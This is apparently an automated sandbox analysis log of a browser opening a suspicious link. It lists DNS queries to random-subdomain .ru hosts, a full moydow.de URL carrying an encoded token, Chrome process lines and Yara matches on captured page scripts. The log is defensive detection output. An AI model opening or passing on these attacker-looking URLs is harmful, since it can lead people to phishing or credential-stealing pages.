Source: global traffic | DNS traffic detected: DNS query: cscu7d92p8txbouicg5l0mzaqlzex8hyiu8es41kvvwopetk1z.bytestrxeam.ru |
Source: global traffic | DNS traffic detected: DNS query: challenges.cloudflare.com |
Source: global traffic | DNS traffic detected: DNS query: developers.cloudflare.com |
Source: global traffic | DNS traffic detected: DNS query: 30l2.zvaznx.ru |
Source: global traffic | DNS traffic detected: DNS query: github.com |
Source: global traffic | DNS traffic detected: DNS query: ok4static.oktacdn.com |
Source: global traffic | DNS traffic detected: DNS query: objects.githubusercontent.com |
Source: global traffic | DNS traffic detected: DNS query: get.geojs.io |
Source: global traffic | DNS traffic detected: DNS query: kbfi4cfujrxchcr2csgbs5xchglhvxkwqbnzhnewgqajnta2en4hc.goldenvisaportugal.ru |
Source: unknown | Network traffic detected: HTTP traffic on port 61975 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 61946 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 61969 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49738 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49736 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734 |
Source: unknown | Network traffic detected: HTTP traffic on port 61961 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732 |
Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49703 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 61941 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 61966 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49700 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49727 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49726 |
Source: unknown | Network traffic detected: HTTP traffic on port 61949 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49725 |
Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 61940 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49719 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49718 |
Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49716 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49715 |
Source: unknown | Network traffic detected: HTTP traffic on port 61948 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 61963 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49713 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711 |
Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49673 |
Source: unknown | Network traffic detected: HTTP traffic on port 49726 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 61939 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705 |
Source: unknown | Network traffic detected: HTTP traffic on port 61968 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49703 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49701 |
Source: unknown | Network traffic detected: HTTP traffic on port 61943 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 61960 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49700 |
Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 61949 |
Source: unknown | Network traffic detected: HTTP traffic on port 49727 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 61956 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 61941 |
Source: unknown | Network traffic detected: HTTP traffic on port 61965 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 61942 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 61943 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 61944 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 61945 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 61946 |
Source: unknown | Network traffic detected: HTTP traffic on port 49701 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 61947 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 61948 |
Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49736 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 61942 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 61940 |
Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49679 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 61959 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49671 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 61953 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 61956 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 61959 |
Source: unknown | Network traffic detected: HTTP traffic on port 49718 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 61945 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 61950 |
Source: unknown | Network traffic detected: HTTP traffic on port 49725 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 61950 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 61963 |
Source: unknown | Network traffic detected: HTTP traffic on port 61939 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49719 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 61965 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 61966 |
Source: unknown | Network traffic detected: HTTP traffic on port 61967 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 61967 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 61968 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 61969 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 61960 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 61961 |
Source: unknown | Network traffic detected: HTTP traffic on port 49738 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 61944 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 61953 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49673 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 61970 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 61975 |
Source: unknown | Network traffic detected: HTTP traffic on port 61947 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49716 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 61970 |
Source: unknown | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1952,i,16432901395981199859,7495216035269137034,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2220 /prefetch:3 |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1952,i,16432901395981199859,7495216035269137034,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2220 /prefetch:3 |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown |
Source: unknown | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://vwj9ymusjv9xeh65cf602u2rmsnkbyf2u7lxtnawlaim1gvceu.moydow.de/5417971987/6327230191/#bnBkL3NmdW9mZGJvYnlmdUFob2p0Ymlkc3ZxJTBsU3RkM0cwdnMvbmJmeXN1VGZ1ekMvezJsdWZxUFhXV0wyNVRmOXZqWkk5eUZbbXJie04xTTZIREp2cGN5dTlRMzplOFZkVEQwMDt0cXV1aQ==" |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown |
Source: Yara match | File source: 2.19.d.script.csv, type: HTML |
Source: Yara match | File source: 3.28..script.csv, type: HTML |
Source: Yara match | File source: 3.29..script.csv, type: HTML |
Source: Yara match | File source: 3.6.pages.csv, type: HTML |
Source: Yara match | File source: 3.8.pages.csv, type: HTML |
Source: Yara match | File source: 3.7.pages.csv, type: HTML |
Source: Yara match | File source: 3.9.pages.csv, type: HTML |